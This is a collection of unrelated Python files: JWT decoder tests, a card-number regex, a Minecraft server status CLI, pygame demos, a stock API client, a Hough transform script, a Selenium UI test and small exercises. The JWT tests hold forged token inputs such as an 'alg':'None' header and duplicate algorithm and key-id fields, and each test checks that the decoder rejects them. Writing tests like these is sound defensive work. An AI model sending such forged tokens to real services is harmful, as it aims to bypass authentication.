self.assert_in_decode_signed_jwt_exception(jwt, "InvalidJWSSignature")
def test_jose_header_contains_multiple_type(self):
header = base64.urlsafe_b64encode(b'{"alg":"RS256", "kid":"EDCRRM","typ":"JWT","typ":"TEST"}')
jwt = header.decode() + "." + jwtio_payload + "." + jwtio_signature
self.assert_in_decode_signed_jwt_exception(jwt, "InvalidJWSSignature")
def test_jose_header_missing_alg(self):
header = base64.urlsafe_b64encode(b'{"kid":"EDCRRM","typ":"JWT"}')
jwt = header.decode() + "." + jwtio_payload + "." + jwtio_signature
self.assert_in_decode_signed_jwt_exception(jwt, "No \"alg\" in headers")
def test_jose_header_invalid_alg(self):
header = base64.urlsafe_b64encode(b'{"alg":"invalid","kid":"EDCRRM","typ":"JWT"}')
jwt = header.decode() + "." + jwtio_payload + "." + jwtio_signature
self.assert_in_decode_signed_jwt_exception(jwt, "Algorithm not allowed")
def test_jose_header_none_alg(self):
header = base64.urlsafe_b64encode(b'{"alg":"None","kid":"EDCRRM","typ":"JWT"}')
jwt = header.decode() + "." + jwtio_payload + "." + jwtio_signature
self.assert_in_decode_signed_jwt_exception(jwt, "Algorithm not allowed")
def test_jose_header_contains_multiple_alg(self):
header = base64.urlsafe_b64encode(b'{"alg":"RS256", "alg":"HS256","kid":"EDCRRM", "typ":"JWT"}')
jwt = header.decode() + "." + jwtio_payload + "." + jwtio_signature
self.assert_in_decode_signed_jwt_exception(jwt, "Algorithm not allowed")
def test_jose_header_missing_kid(self):
header = base64.urlsafe_b64encode(b'{"alg":"RS256", "typ":"JWT"}')
jwt = header.decode() + "." + jwtio_payload + "." + jwtio_signature
self.assert_in_decode_signed_jwt_exception(jwt, "Missing kid")
def test_jose_header_contains_multiple_kid(self):
header = base64.urlsafe_b64encode(b'{"alg":"RS256", "kid":"test", "kid":"EDCRRM", "typ":"JWT"}')
jwt = header.decode() + "." + jwtio_payload + "." + jwtio_signature
self.assert_in_decode_signed_jwt_exception(jwt, "InvalidJWSSignature")
def test_jose_header_contains_invalid_kid(self):
header = base64.urlsafe_b64encode(b'{"alg":"RS256", "kid":"UNKNOWN", "typ":"JWT"}')
jwt = header.decode() + "." + jwtio_payload + "." + jwtio_signature
self.assert_in_decode_signed_jwt_exception(jwt, "Invalid public Key Identifier")
def test_signature_not_2048_bits(self):
jwt = jwtio_header + "." + jwtio_payload + "." + base64.urlsafe_b64encode(os.urandom(255)).decode()
self.assert_in_decode_signed_jwt_exception(jwt, "InvalidJWSSignature")
def test_payload_corrupt(self):
jwt = jwtio_header + ".asdasd." + jwtio_signature
self.assert_in_decode_signed_jwt_exception(jwt, "InvalidJWSSignature")
def test_header_corrupt(self):
jwt = "asdsadsa" + "." + jwtio_payload + "." + jwtio_signature
self.assert_in_decode_signed_jwt_exception(jwt, "Invalid Header")
def test_signature_corrupt(self):
jwt = jwtio_header + "." + jwtio_payload + ".asdasddas"
self.assert_in_decode_signed_jwt_exception(jwt, "Invalid JWS Object")
def test_payload_contains_malformed_json(self):
payload = base64.urlsafe_b64encode(b'{"user":"jimmy,"iat": "1454935765","exp": "2075297148"')
jwt = jwtio_header + "." + payload.decode() + "." + jwtio_signature
self.assert_in_decode_signed_jwt_exception(jwt, "InvalidJWSSignature")
def test_payload_contains_corrupted_json(self):
payload = base64.urlsafe_b64encode(b'{"user":"jimmy","iat": "1454935765","exp": "2075297148"}ABDCE')
jwt = jwtio_header + "." + payload.decode() + "." + jwtio_signature
self.assert_in_decode_signed_jwt_exception(jwt, "InvalidJWSSignature")
def test_payload_does_not_contain_exp(self):
valid_token_no_exp = "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IkVEQ1JSTSJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibm" \
"FtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6IjE0NTQ5MzU3NjcifQ.VupTBEOEzeDjxd37PQ34xv" \
"BlLzeGTA0xFdGnLZDcnxAS1AjNcJ66edRmr4tmPIXnD6Mgen3HSB36xuXSnfzPld2msFHUXmB18CoaJQK19BXEY" \
"vosrBPzc1ohSvam_DgXCzdSMAcWSE63e6LTWNCT93-npD3p9tjdY_TWpEOOg14"
self.assert_in_decode_signed_jwt_exception(valid_token_no_exp, "Claim exp is missing")
def test_payload_does_not_contain_iat(self):
valid_token_no_iat = "eyJhbGciOiJSUzI1NiIsImtpZCI6IjcwOWViNDJjZmVlNTU3MDA1OGNlMDcxMWY3MzBiZmJiN2Q0YzhhZGUiLCJ" \
"0eXAiOiJqd3QifQ.eyJlcV9pZCI6IjEiLCJleHAiOjIwNzcxODg5MDksImZvcm1fdHlwZSI6IjAyMDUiLCJqdGk" \
"iOiIzMmIxNDdjNS04OWEzLTQxMzUtYjgxMy02YzQzNTE1Yzk3MTkifQ.lPTbkzQhrktcRCgn2-ku4eqr5zpgetn" \
"I8JjipBsm3WrxALnnQc4QebtsPIP9vxv9cRLkis6FMZa3Lm6A5fVAHwsCKMOsDjBFf3QXVtLIgRMW-Q8VNowj5F" \
"UW5TAQhRAka-Og9lI3gTpcN-ynhnb0arlGKhbzJU03K0KEBPTT6TDRUeKZAUTAA29qxmPIVbhuQNAjmHX7uSW4z" \
"_OKLi1OdIlFEvC6X5rddkfv2yhGDNpO4ZfUcHvcfCgyg16WQDSBKVLQf2uk8-Ju_zOv4818Obb12N7CJvAb5eys" \
"vnW3MSbAQhvvJJYe8WCN7j1uHZxRpwIPgAGvGiN9Sa1Gq14EWA"
self.assert_in_decode_signed_jwt_exception(valid_token_no_iat, "Claim iat is missing")
def test_payload_invalid_exp(self):
valid_token_with_invalid_exp = "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IkVEQ1JSTSJ9.eyJzdWIiOiIxMjM0NTY3" \
"ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6IjE0NTQ5MzU3NjUiLCJle" \
"HAiOiI_In0.0ApxEXw1rzo21XQo8WgcPvnz0e8QnT0GaoXVbCj-OdJtB7GArPzaiQ1cU53WaJsvGE" \
"zHTczc6Y0xN7WzcTdcXN8Yjenf4VqoiYc6_FXGJ1s9Brd0JOFPyVipTFxPoWvYTWLXE-CAEpXrEb3" \
"0kB3nRjHFV_yVhLiiZUU-gpUHqNQ"
self.assert_in_decode_signed_jwt_exception(valid_token_with_invalid_exp, "Claim exp is not an integer")
def test_payload_invalid_iat(self):
valid_token_with_invalid_iat = "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IkVEQ1JSTSJ9.eyJzdWIiOiIxMjM0NTY3" \
"ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6ImEiLCJleHAiOiIyMDc1M" \
"jk3MTQ4In0.1NIuxcD1FsZlU17NxK4UHdCfzl7qTV03qEaTRcqTC6A1Fs2Alc7mSQgkF_SpUw4Ylt" \
"n-7DhO2InfcwDA0VhxBOHDL6ZzcEvzw-49iD-AaSd4aINIkDK-Iim5uzbKzgQCuZqSXFqxsZlezA4" \
"BtwV7Lv2puqdPrXT8k3SvM2rOwRw"
self.assert_in_decode_signed_jwt_exception(valid_token_with_invalid_iat, "Claim iat is not an integer")
def test_payload_expired_exp(self):
valid_token_with_exp_in_the_past = "eyJraWQiOiI3MDllYjQyY2ZlZTU1NzAwNThjZTA3MTFmNzMwYmZiYjdkNGM4YWRlIiwidHlwI" \
"joiand0IiwiYWxnIjoiUlMyNTYifQ.eyJpYXQiOjE0OTg2NTQzOTcuMDgxOTE1LCJlcV9pZCI" \
"6IjEiLCJmb3JtX3R5cGUiOiIwMjA1IiwiZXhwIjoxNDk4NjU0Mzk2LjA4MTkxNSwianRpIjoi" \
"NzZlNjllYTAtZWRlYi00NGY5LThkYWEtY2Q1ZDQzNzg5YmM1In0.CKWYyIcDbZaUXvdDno2B3" \
"0w599_VXqicKkVjoeF4kNxc8aUcc_6J-rxTI8OU0OEoy8ywUTMBwYQnCHAuleBUYcmE9oNaHA" \
"HHbfvTRVDpi1rIFc3vnoy37hx7v-iRElNJ_CNrGw5aURZ_eFarH2EiSNf7tdIy8H1xn0GnHMB" \
"3-fmFylj9wvNR4td5MteAAeZlvsRf4uPj2GCm44re-n4iRY9z3ocZcKvUYVIJFOEK3XUerUdy" \
"zZBGqbf-uIPB615nJgZF0PPS6e85VzrmyLD54fqrDrSnklKhu4dfMf_YdbegWvi7lUv7z_QIH" \
"PRlUgxPsWKmV2G1SeVKRqbx1n_raA"
self.assert_in_decode_signed_jwt_exception(valid_token_with_exp_in_the_past, "Expired at")
def test_payload_exp_less_than_iat(self):
valid_token_with_exp_less_than_iat = "eyJraWQiOiI3MDllYjQyY2ZlZTU1NzAwNThjZTA3MTFmNzMwYmZiYjdkNGM4YWRlIiwiYW" \
"xnIjoiUlMyNTYiLCJ0eXAiOiJqd3QifQ.eyJmb3JtX3R5cGUiOiIwMjA1IiwiaWF0IjoxNDk" \
"4NjU0MjEzLjk5NjQ2MywianRpIjoiNWFkODdjMGQtZjZlOC00MDEyLWEyM2UtMjc4MzY4YjF" \
"kZmFmIiwiZXFfaWQiOiIxIiwiZXhwIjoxNDk4NjUwNjEzLjk5NjQ2M30.kAAO0uZG02sTJpQ" \
"DzUFkIU7UGR9ulJV6idZJsWkJcsIu4G1JHfCoyNCzJr9xT8RRPbUrgkdVkuLD0gzOnD0Ylqj" \
"xKxpoRTVUtD4p2l-5FuXcqIpy6jtQWsx1YGvMfdCRwsvpVVAUiFAhSddC0QRHvqweet7WgMq" \
"SAvNz6zkOTVvW5ChjrK3IaGOAl3T6jWFN1xJCHcdlMef6S8t3ECP5NaP5HRnRxiVmV63x_RR" \
"uSBwLbz_IMHUPPe6JcMRTMnzL8qM2Kwg227mHlmQhn3OMjagzraZZeQ4aedghalYoItZE80d" \
"AcfDWs8DPJPqhJ0JGdA08A7ningHV67LRm6zkYw"
self.assert_in_decode_signed_jwt_exception(valid_token_with_exp_less_than_iat, "Expired at")
def test_payload_contains_more_than_one_iat(self):
payload = base64.urlsafe_b64encode(b'{"user":"jimmy",'
b'"iat": "1454935765",'
b'"iat": "1454935765",'
b'"exp": "2075297148"}')
jwt = jwtio_header + "." + payload.decode() + "." + jwtio_signature
self.assert_in_decode_signed_jwt_exception(jwt, "InvalidJWSSignature")
def test_payload_contains_more_than_one_exp(self):
payload = base64.urlsafe_b64encode(b'{"user":"jimmy",'
b'"iat": "1454935765",'
b'"exp": "1454935765",'
b'"exp": "2075297148"}')
jwt = jwtio_header + "." + payload.decode() + "." + jwtio_signature
self.assert_in_decode_signed_jwt_exception(jwt, "InvalidJWSSignature")
def assert_in_decode_signed_jwt_exception(self, jwe, error):
with pytest.raises(InvalidTokenException) as ite:
JWTHelper.decode(jwe, self.key_store, purpose=KEY_PURPOSE_AUTHENTICATION, check_claims=self.CHECK_CLAIMS)
# Looks weird, but ite.value is an exception object. The error message is contained in the 'value' attribute
# of that object.
if error not in ite.value.value:
raise AssertionError(
'"{}" not found in decode exception. Actual exception message [{}]'.format(error, ite.value.value))
def test_encode_with_dict_and_string(self):
claims_as_dict = {
'data': [
{
'string': 'something',
'boolean': True,
'number': 10,
'decimal': 10.1,
'null': None
}
]
}
claims_as_string = json.dumps(claims_as_dict)
string_token = JWTHelper.encode(claims=claims_as_string, kid='EQ_USER_AUTHENTICATION_EQ_KEY',
key_store=self.key_store, purpose=KEY_PURPOSE_AUTHENTICATION)
dict_token = JWTHelper.encode(claims=claims_as_dict, kid='EQ_USER_AUTHENTICATION_EQ_KEY',
key_store=self.key_store, purpose=KEY_PURPOSE_AUTHENTICATION)
string_token_decode = JWTHelper.decode(jwt_token=string_token, key_store=self.key_store_secondary,
purpose=KEY_PURPOSE_AUTHENTICATION)
dict_token_decode = JWTHelper.decode(jwt_token=dict_token, key_store=self.key_store_secondary,
purpose=KEY_PURPOSE_AUTHENTICATION)
assert string_token_decode == dict_token_decode
|
import re
for _ in range(int(input())):
s = input()
if re.fullmatch(r'[456]\d{3}(-?)\d{4}\1\d{4}\1\d{4}', s) and not re.search(r'(\d)\1{3}', s.replace('-', '')):
print("Valid")
else:
print("Invalid")
|
import click
from .. import MinecraftServer
server = None
@click.group(context_settings=dict(help_option_names=['-h', '--help']))
@click.argument("address")
def cli(address):
"""
mcstatus provides an easy way to query Minecraft servers for
any information they can expose. It provides three modes of
access: query, status, and ping.
Examples:
\b
$ mcstatus example.org ping
21.120ms
\b
$ mcstatus example.org:1234 ping
159.903ms
\b
$ mcstatus example.org status
version: v1.8.8 (protocol 47)
description: "A Minecraft Server"
players: 1/20 ['Dinnerbone (61699b2e-d327-4a01-9f1e-0ea8c3f06bc6)']
\b
$ mcstatus example.org query
host: 93.148.216.34:25565
software: v1.8.8 vanilla
plugins: []
motd: "A Minecraft Server"
players: 1/20 ['Dinnerbone (61699b2e-d327-4a01-9f1e-0ea8c3f06bc6)']
"""
global server
server = MinecraftServer.lookup(address)
@cli.command(short_help="prints server latency")
def ping():
"""
Ping server for latency.
"""
click.echo("{}ms".format(server.ping()))
@cli.command(short_help="basic server information")
def status():
"""
Prints server status. Supported by all Minecraft
servers that are version 1.7 or higher.
"""
response = server.status()
click.echo("version: v{} (protocol {})".format(response.version.name, response.version.protocol))
click.echo("description: \"{}\"".format(response.description))
click.echo(
"players: {}/{} {}".format(
response.players.online,
response.players.max,
[
"{} ({})".format(player.name, player.id)
for player in response.players.sample
] if response.players.sample is not None else "No players online"
)
)
@cli.command(short_help="detailed server information")
def query():
"""
Prints detailed server information. Must be enabled in
servers' server.properties file.
"""
response = server.query()
click.echo("host: {}:{}".format(response.raw['hostip'], response.raw['hostport']))
click.echo("software: v{} {}".format(response.software.version, response.software.brand))
click.echo("plugins: {}".format(response.software.plugins))
click.echo("motd: \"{}\"".format(response.motd))
click.echo(
"players: {}/{} {}".format(
response.players.online,
response.players.max,
response.players.names,
)
)
if __name__ == "__main__":
cli()
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Copyright (C) 2011 Rodrigo Pinheiro Marques de Araujo
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
import sys
import socket
import logging
SOCKET_FILE="/tmp/.perfectresume"
LOG_FILE = SOCKET_FILE + ".client.log"
MAGIC_NUMBER = '42'
logging.basicConfig(filename=LOG_FILE,level=logging.DEBUG,
format="%(asctime)s - %(levelname)s - %(message)s")
def main():
logging.info("params " + " ".join(sys.argv))
if sys.argv[1] == "resume" or sys.argv[1] == "thaw":
logging.info("sending message")
try:
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.connect(SOCKET_FILE)
s.send(MAGIC_NUMBER)
data = s.recv(1024)
if data == 'ok':
logging.info("message is ok")
sys.exit(0)
else:
logging.error("data is " + data)
sys.exit(1)
except Exception, error:
logging.exception("error")
sys.exit(1)
finally:
s.close()
if __name__ == "__main__":
main()
|
from sys import stdout
def show_progress(counter, max_num):
stdout.flush()
stdout.write("\rthinking...(%d/%d)" % (counter+1, max_num))
def fin_progress():
stdout.write("\r\n")
|
# Shadows
import pygame, projections3D, structures_3D
size = 1000
class World(projections3D.Projection):
"""docstring for World."""
def __init__(self, width, height, background=(255, 255, 255), floor=None):
super(World, self).__init__(width, height)
self.background = background
self.floor = floor
def project_all_shadows(self):
for thing in self.objects.values():
if thing.shadow:
thing.shadow.project_on_surface(self.floor)
def run(self):
"""Create a pygame screen until it is closed."""
key_to_function = {
pygame.K_LEFT: (lambda x: x.rotateAll('Y', -0.1)),
pygame.K_RIGHT: (lambda x: x.rotateAll('Y', 0.1)),
pygame.K_UP: (lambda x: x.rotateAll('X', -0.1)),
pygame.K_DOWN: (lambda x: x.rotateAll('X', 0.1)),
pygame.K_q: (lambda x: x.rotateAll('Z', -0.1)),
pygame.K_e: (lambda x: x.rotateAll('Z', 0.1)),
pygame.K_d: (lambda x: x.move_all('x', 10)),
pygame.K_a: (lambda x: x.move_all('x', -10)),
pygame.K_s: (lambda x: x.move_all('y', 10)),
pygame.K_w: (lambda x: x.move_all('y', -10)),
pygame.K_LSHIFT: (lambda x: x.scaleAll(1.25)),
pygame.K_LCTRL: (lambda x: x.scaleAll( 0.8))
}
done = False
while not done:
keys = pygame.key.get_pressed()
for key in key_to_function.keys():
if keys[key]:
key_to_function[key](self)
for event in pygame.event.get():
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
done = True
if self.floor != None:
self.project_all_shadows()
pygame.time.delay(100)
self.display()
pygame.display.flip()
pygame.quit()
return done
def display(self):
""" Draw the objects on the screen. """
self.screen.fill(self.background)
for thing in self.objects.values():
for edge in thing.edges:
pygame.draw.aaline(self.screen, thing.edge_color, (edge.start.x, edge.start.y), (edge.end.x, edge.end.y), 1)
for node in thing.nodes:
pygame.draw.circle(self.screen, thing.node_color, (int(node.x), int(node.y)), self.nodeRadius, 0)
for node in thing.shadow.nodes:
pygame.draw.circle(self.screen, thing.shadow.color, (int(node.x), int(node.y)), self.nodeRadius, 0)
class Mat_object(structures_3D.Object):
"""docstring for Mat_object."""
def __init__(self, nodes=[], edges=[], node_color=(0,0,0), edge_color=(125,125,125), shadow=True):
super(Mat_object, self).__init__(nodes, edges, node_color=(0,0,0), edge_color=(125,125,125))
if shadow:
shadow_color = (0, 0, 0)
self.shadow = Shadow(self, shadow_color)
class Shadow(object):
"""docstring for Shadow."""
def __init__(self, thing, shadow_color=(0, 0, 0)):
"""Given the object initializes its shadow"""
# First i will have the second object being a static flat floor
super(Shadow, self).__init__()
self.thing = thing
self.color = shadow_color
self.shadow = structures_3D.Object([], [], shadow_color)
self.nodes = []
def project_on_surface(self, surface, plain=True):
"""Given a surface"""
self.nodes = []
if plain:
for node in self.thing.nodes:
# hallo el punto node' en superficie surface con la ecuación de la recta (x, y, z) = (node.x, node.y, node.z) + lambda(n.x, n.y, n.z)
l = (- surface.normal.x*node.x - surface.normal.y*node.y - surface.normal.z*node.z - surface.d)/(surface.normal.x**2 + surface.normal.y**2 + surface.normal.z**2)
self.nodes.append(structures_3D.Node(node.x+surface.normal.x*l, node.y+surface.normal.y*l, node.z+surface.normal.z*l))
world = World(size, size, (255, 255, 255), structures_3D.Plane(equation="0x +y +0z -500")) # structures_3D.Plane(equation="x+0+z=0")
cube_nodes = [structures_3D.Node(x, y, z) for x in (0, 50) for y in (0, 50) for z in (0, 50)]
# for node in cube_nodes:
# print("x: {0} y: {1} z: {2}".format(node.x, node.y, node.z))
edges = [(cube_nodes[n],cube_nodes[n+4]) for n in range(0,4)] + [(cube_nodes[n],cube_nodes[n+1]) for n in range(0,8,2)] + [(cube_nodes[n],cube_nodes[n+2]) for n in (0,1,4,5)]
cube_edges = []
for edge in edges:
cube_edges.append(structures_3D.Edge(edge[0], edge[1]))
cube = Mat_object(cube_nodes, cube_edges)
world.add_object("cube", cube)
world.run()
|
import re
import asyncio
import aiohttp
import requests
class APIHandler:
def __init__(self, api_key):
self.api_key = api_key
self.base_query_url = 'https://www.alphavantage.co/query'
async def fetch_data(self, session, url):
"""
Retrieve json data from a given url through API
:param session: aiohttp Client session
:param url: a url where to request data
:return: a response data in json format
"""
result = None
while not result:
try:
async with session.get(url) as res:
res.raise_for_status()
result = await res.json()
except aiohttp.ClientError as error:
print(f'Exceed max requests, so sleep a little '
f'and try again for {url}')
print(error)
# sleep a little and try again
await asyncio.sleep(2)
return result
async def check_and_fetch_all(self, urls, loop):
async with aiohttp.ClientSession(loop=loop) as session:
results = await asyncio.gather(
*[self.fetch_data(session, url)
for url in urls],
return_exceptions=True)
return results
@staticmethod
def clean_dict(data_dict):
"""
Optimize the key name of each item in a given data_dict
:param data_dict: a dict data to optimize
:return: an optimized dict data
"""
return {
re.sub(r'\d+.', '', j).strip(): v for j, v in data_dict.items()
}
def get_details_by_keyword(self, keyword):
"""
Get a list of symbols with additional details based on the given
keyword from alphavantage through API
:param keyword: a symbol to find matching data
:return: a list of symbols with additional details
"""
api_url = f"{self.base_query_url}?function=SYMBOL_SEARCH" \
f"&keywords={keyword}&apikey={self.api_key}"
response = requests.get(api_url)
if not response.ok:
print('Failed to get matching symbols through API.')
return []
matches = [self.clean_dict(i) for i in response.json()['bestMatches']]
return matches
def get_time_series_by_symbol(self, symbol, functions):
"""
Get time series of given functions through API
:param symbol: a symbol name literally
:param functions: a list of functions. e.x. TIME_SERIES_MONTHLY
"""
api_urls = []
response_list = []
for func in functions:
if func == 'TIME_SERIES_INTRADAY':
interval = '15min'
url = f"{self.base_query_url}?" \
f"function={func}" \
f"&symbol={symbol}" \
f"&interval={interval}" \
f"&apikey={self.api_key}"
else:
url = f"{self.base_query_url}?" \
f"function={func}" \
f"&symbol={symbol}" \
f"&apikey={self.api_key}"
api_urls.append(url)
loop = asyncio.get_event_loop()
response_list += loop.run_until_complete(
self.check_and_fetch_all(api_urls, loop))
result_list = []
for response in response_list:
result = {'title': [*response.keys()][-1]}
table = [
[i, *v.values()]
for i, v in response[result['title']].items()
]
result['table'] = table
result['columns'] = ['datetime', 'open', 'high',
'low', 'close', 'volume']
result_list.append(result)
return result_list
def get_quote_by_symbol(self, symbol, func):
"""
Get the current quote of a given symbol
:param symbol: a symbol name literally
:param func: the name of the function. e.x. GLOBAL_QUOTE
"""
api_url = f"{self.base_query_url}?function={func}" \
f"&symbol={symbol}&apikey={self.api_key}"
response = requests.get(api_url)
if not response.ok:
print('Failed to get the current quote of a symbol through API.')
return []
data = self.clean_dict(response.json()['Global Quote'])
return data
def get_technical_indicators_by_symbol(self,
symbol,
functions,
interval='weekly',
time_period='10',
series_type='open'):
"""
Get technical indicators of given functions through API
:param symbol: a symbol name literally
:param functions: a list of functions. e.x. EMA, SMA
:param interval: time interval between two consecutive data points
in the time series
:param time_period: number of data points used to
calculate each moving average value
:param series_type: the desired price type in the time series
"""
api_urls = []
response_list = []
for func in functions:
url = f"{self.base_query_url}?" \
f"function={func}" \
f"&symbol={symbol}" \
f"&interval={interval}" \
f"&time_period={time_period}" \
f"&series_type={series_type}" \
f"&apikey={self.api_key}"
api_urls.append(url)
loop = asyncio.get_event_loop()
response_list += loop.run_until_complete(
self.check_and_fetch_all(api_urls, loop))
result_list = []
try:
for response in response_list:
result = {'title': [*response.keys()][-1]}
table = [
[i, *v.values()]
for i, v in response[result['title']].items()
]
result['table'] = table
result['columns'] = ['datetime', result['title'].split(':')[-1].strip()]
result_list.append(result)
except Exception as error:
# Pass this exception error for now because the error comes up
# due to the limited number of requests.
pass
return result_list
|
import numpy as np
import cv2
def houghTransform(edged,x0,x1,y0,y1):
maxVote = 0
# loop the region and find the edge pixel
for x in range(x0,x1):
for y in range(y0,y1):
if edged[y,x] > 0:
for a in range(x0,x1):
for b in range(y0,y1):
for rIdx in range (len(radii)):
# if the a,b,r satisfies the circle's equation,the accumulator
# is incremented by 1
if((x - a)**2 + (y - b)**2 == (radii[rIdx])**2):
accu[a][b][rIdx] += 1
# find the local largest numberof vote and draw the circle (a,b,r)
# a,b is the position of the center, and r is the radius of the circle
for x2 in range(x0,x1) :
for y2 in range(y0,y1):
for rIdx1 in range(len(radii)):
if(accu[x2,y2,rIdx1] > maxVote):
cX = x2
cY = y2
cR = radii[rIdx1]
maxVote = accu[x2,y2,rIdx1]
if maxVote > 3:
cv2.circle(img, (cX,cY),cR,255,1)
if __name__ == "__main__":
img = cv2.imread('Houghcircles.jpg',0)
blur = cv2.GaussianBlur(img,(3,3),1)
v = np.median(blur)
# apply automatic Canny edge detection using the computed median
lower = int(max(0, (1.0 - 0.43) * v))
upper = int(min(255, (1.0 + 0.43) * v))
edged = cv2.Canny(blur, lower, upper)
cX=0
cY=0
cR = 0
h,w = edged.shape
radii = range(20,60,2)
accu = np.zeros((w,h,len(radii)))
houghTransform(edged,450,600,1,400) #10th
houghTransform(edged,0,300,0,100)# First circle
houghTransform(edged,100,240,100,240)# Second
houghTransform(edged,0,140,240,340) # Third
houghTransform(edged,240,320,100,180) #Forth
houghTransform(edged,160,240,280,360) # 5th
houghTransform(edged,232,340,240,360) #6th
houghTransform(edged,340,460,40,150) #7th
houghTransform(edged,340,460,170,280) #8th
houghTransform(edged,360,460,300,390) #9th
cv2.imshow('result1',img)
cv2.imwrite('myhough.jpg',img)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
import pygame
from pygame import font
class Button():
def __init__(self,alien_setting,screen,msg):
# 初始化按钮属性
self.screen = screen
self.screenRect = screen.get_rect()
#设置按钮的尺寸和其他属性
self.width,self.height = 200,50
self.buttonColor = (0,255,0)
self.textColor = (255,255,255)
self.font = font.SysFont(None,48)
# 创建按钮的rect对象,并使其居中
self.rect = pygame.Rect(0,0,self.width,self.height)
self.rect.center = self.screenRect.center
#该按钮的标签只需要创建一次
self.prepMsg(msg)
def prepMsg(self,msg):
'''将msg渲染为图像,并使其在按钮上居中'''
self.msgImage = self.font.render(msg,True,self.textColor,self.buttonColor)
self.msgImageRect = self.msgImage.get_rect()
self.msgImageRect.center = self.rect.center
def drawButton(self):
self.screen.fill(self.buttonColor,self.rect)
self.screen.blit(self.msgImage,self.msgImageRect)
|
#input
# 27
# 90 17
# 67 76
# 21 22
# 28 66
# 58 33
# 47 25
# 40 48
# 22 21
# 11 15
# 57 64
# 65 76
# 38 36
# 88 19
# 70 25
# 52 27
# 77 51
# 34 53
# 37 46
# 66 56
# 21 34
# 79 59
# 50 29
# 17 62
# 41 18
# 68 88
# 73 42
# 73 20
def chance_for_a_to_win(pa,pb):
return sum(((1-pa)*(1-pb))**(n-1) * (pa) for n in range(1,100)) + 1e-7
# or
def chance_for_a_to_win2(pa,pb):
return pa/(1-(1-pa)*(1-pb))
def main():
n = int(input())
for i in range(0,n):
(pA, pB) = (int(x) for x in input().split())
chance = chance_for_a_to_win2(pA/100,pB/100)
print(round(chance*100),end=' ')
if __name__ == '__main__':
main() |
"""
Author: Sidhin S Thomas (sidhin@trymake.com)
Copyright (c) 2017 Sibibia Technologies Pvt Ltd
All Rights Reserved
Unauthorized copying of this file, via any medium is strictly prohibited
Proprietary and confidential
""" |
import time
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.action_chains import ActionChains
from Home_Work_python.Learn_python3.Home_Work_10_selenium.custome_wait import presence_of_elements
dr = webdriver.Chrome(executable_path=r"/Users/fabric/PycharmProjects/chromedriver")
dr.get('http://localhost:8888/oxwall/')
wait = WebDriverWait(dr, 10)
# скрипт логирования пользователя
# frame_element = dr.find_element(By.NAME, "demobody")
# dr.switch_to.frame(frame_element)
sing_in = wait.until(EC.visibility_of_element_located((By.CLASS_NAME, 'ow_signin_label')))
sing_in.click()
username_email_field = dr.find_element(By.CSS_SELECTOR, '.ow_user_name input').send_keys('fabric')
pass_field = dr.find_element(By.CSS_SELECTOR, '.ow_password input').send_keys('pass')
button_sign_in = dr.find_element(By.NAME, 'submit').click()
# Подсчет постов до публикации
count_of_post = len(dr.find_elements(By.CLASS_NAME, 'ow_newsfeed_item'))
print(count_of_post)
# написания коментария
comment_field = wait.until(EC.visibility_of_element_located((By.CSS_SELECTOR, '.ow_smallmargin textarea')))
comment_field.send_keys("test comment123")
add_comment_button = dr.find_element(By.CLASS_NAME, 'ow_attachment_btn input').click()
# custom_wait
results = wait.until(presence_of_elements((By.CLASS_NAME, "ow_newsfeed_item"), count_of_post), message="Less than ")
print("Count After = ", len(results))
assert len(results) == count_of_post + 1
# Добавить пост с фотографией
enter_field = dr.find_element(By.CSS_SELECTOR, '.ow_smallmargin textarea').click()
button_attach = dr.find_element(By.CSS_SELECTOR, "input.mlt_file_input").send_keys('/Users/fabric/oxwall.jpg')
wait.until(EC.invisibility_of_element((By.CSS_SELECTOR, "a.ow_photo_attachment_pic.ow_attachment_preload.loading")))
add_comment_withphoto_button = dr.find_element(By.CLASS_NAME, 'ow_attachment_btn input').click()
time.sleep(2)
# разлогирование пользователя c ховером
button_sign_out = dr.find_element(By.CSS_SELECTOR, '.ow_console_item.ow_console_dropdown.ow_console_dropdown_hover')
action = ActionChains(dr)
action.move_to_element(button_sign_out)
action.perform()
button_log_out = dr.find_element(By.XPATH, "//li[7]/div/a")
button_log_out.click()
dr.close()
|
"""
Modifique as funções que foram cridas no desafio 107 para que elas aceitem
um parâmetro a mais, informando se o valor retornado por elas vai ser ou não
formatado pela função moeda(), desenvolvida no desafio 108.
"""
from df109_moeda import moeda
price = float(input('Price: R$'))
print(f'The double of {moeda.moeda(price)} is {moeda.double(price, True)}')
print(f'The half of {moeda.moeda(price)} is {moeda.half(price, True)}')
print(f'The plus of 10% of {moeda.moeda(price)} is {moeda.plus(price, 10, False)}')
print(f'The decrease of 40% of {moeda.moeda(price)} is {moeda.decrease(price, 40, True)}')
|
# -*- coding: UTF-8 -*-
import sys
import re
import time
def wordCount(file_in):
file_in = open(file_in, 'r')
file_out = open('result', 'w')
words = {}
tic = time.clock()
for line in file_in:
line = re.sub('[^(a-zA-Z)+\ \']+', " ", line)
line_words = line.split()
for word in line_words:
if word in words.keys():
words[word] += 1
else:
words[word] = 1
toc = time.clock()
print "time it takes is: " + str(toc - tic)
for word in words:
file_out.write(word + "\t:\t" + str(words[word]) + '\n')
file_in.close()
file_out.close()
if __name__ == "__main__":
